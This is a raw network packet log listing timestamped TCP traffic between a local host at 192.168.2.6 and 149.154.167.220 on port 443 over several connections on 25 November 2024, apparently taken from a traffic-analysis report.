                                                                                      Nov 25, 2024 13:40:15.523930073 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.523972988 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.524013996 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.524023056 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.524049997 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.524049997 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.571329117 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.571679115 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.571772099 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.571832895 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.571882963 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.572041988 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.572109938 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.582475901 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.619333982 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.657084942 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.657255888 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.657308102 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.657423019 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.657545090 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.657588005 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.657773972 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.657906055 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.699343920 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.776376963 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.776611090 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.776642084 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.776787043 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.819345951 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.819470882 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.819597006 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.819731951 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.848112106 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.867340088 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.873090982 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.873239994 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.873301983 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.873480082 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.898830891 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.899004936 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.899195910 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.899230003 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.899230003 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.899255037 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.899303913 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.899594069 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.938574076 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.938700914 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.938894033 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.938942909 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939003944 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.939125061 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939155102 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939192057 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.939233065 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:15.939264059 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939310074 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939631939 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939812899 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939857006 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.939888000 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:15.979376078 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.020081043 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.020327091 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.020518064 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.020570040 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.020606995 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024116039 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.024137974 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.024261951 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024313927 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.024451971 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024470091 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.024538040 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024625063 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024705887 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024772882 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.024782896 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.025010109 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.025059938 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.026930094 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.026985884 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.027165890 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.027219057 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.027338982 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.027355909 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.027442932 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.027460098 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.028115988 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.028176069 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.028312922 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.028357029 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.028470993 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.051213980 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.071372032 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.115422010 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.115634918 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.115849972 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.115897894 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.115925074 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.138098955 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.138519049 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.138648033 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.138709068 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.138889074 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.138971090 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.139031887 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.139074087 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.139118910 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.139173031 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.139213085 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.140878916 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141021967 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141119003 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141156912 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141237020 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141295910 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141336918 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141346931 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141376972 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141400099 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141412973 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141474962 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141489983 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141495943 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141540051 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141544104 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141582012 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.141628027 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.141693115 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.143913031 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.144385099 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.144550085 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.144579887 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.147768021 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.147980928 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.147998095 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.148067951 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148080111 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.148139000 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148202896 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148206949 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.148220062 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148233891 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.148375034 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148391962 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.148410082 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148483992 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148507118 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148555040 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148611069 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148654938 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.148695946 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.151268005 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.151304960 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.151423931 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.151483059 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.151492119 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.151511908 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.151601076 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.152910948 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.152940035 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.153620958 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.153774977 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.153814077 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.153816938 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.153831005 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.153841019 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.153853893 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.153865099 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.153947115 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.154005051 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.154067039 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.154079914 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.155159950 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.155369997 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.155595064 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.155627012 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.155700922 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.155730963 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.156002045 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.178303003 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.178361893 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.178591967 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.178600073 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.178745031 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.178783894 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.219347000 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.236476898 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.236653090 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.236753941 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.236785889 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.236819029 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.236932039 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.236994982 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.237159967 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.237279892 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.238199949 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.238377094 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.238518000 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.238594055 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.238635063 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.238898039 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.259299040 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.259433985 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.259589911 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.259649992 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.259794950 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.259849072 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.259922981 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.259999037 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:16.260032892 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.261208057 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.263515949 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:16.270340919 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:22.168706894 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:22.168834925 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.168845892 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:22.168900967 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.168931961 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:22.168991089 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.169641018 CET49841443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.169655085 CET44349841149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:22.352807045 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.352849007 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:22.352979898 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.353379011 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:22.353395939 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:23.768529892 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:23.768836975 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:23.769553900 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:23.769562960 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:23.770360947 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:23.770379066 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:23.770529032 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:23.770539999 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:24.817434072 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:24.817523956 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:24.817538023 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:24.817576885 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:24.817878962 CET49862443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:24.817897081 CET44349862149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:27.803071976 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:27.803123951 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:27.803251028 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:27.803597927 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:27.803611040 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.210403919 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.212913036 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.221893072 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.221904039 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.222206116 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.222213984 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.222600937 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.222615004 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.222831011 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.222846031 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.222982883 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223052979 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223208904 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223222971 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223309040 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223326921 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223377943 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223388910 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223527908 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223536015 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223556042 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223562956 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223578930 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223587990 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223602057 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223607063 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223624945 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223633051 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223647118 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223655939 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223664999 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223673105 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223721027 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223731041 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223748922 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223757982 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223773956 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223792076 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223800898 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223861933 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223871946 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223891020 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223897934 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223921061 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223928928 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223942041 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223952055 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.223968029 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.223973989 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.224006891 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224006891 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224020958 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.224035025 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224056959 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.224088907 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224100113 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224164963 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224189997 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224263906 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224286079 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224306107 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224349022 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224374056 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224395037 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.224431992 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.271341085 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.271883011 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272155046 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272224903 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272296906 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272620916 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272676945 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272701025 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272739887 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272752047 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272778988 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.272788048 CET49876443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:29.319334984 CET44349876149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:29.321206093 CET49876443192.168.2.6149.154.167.220
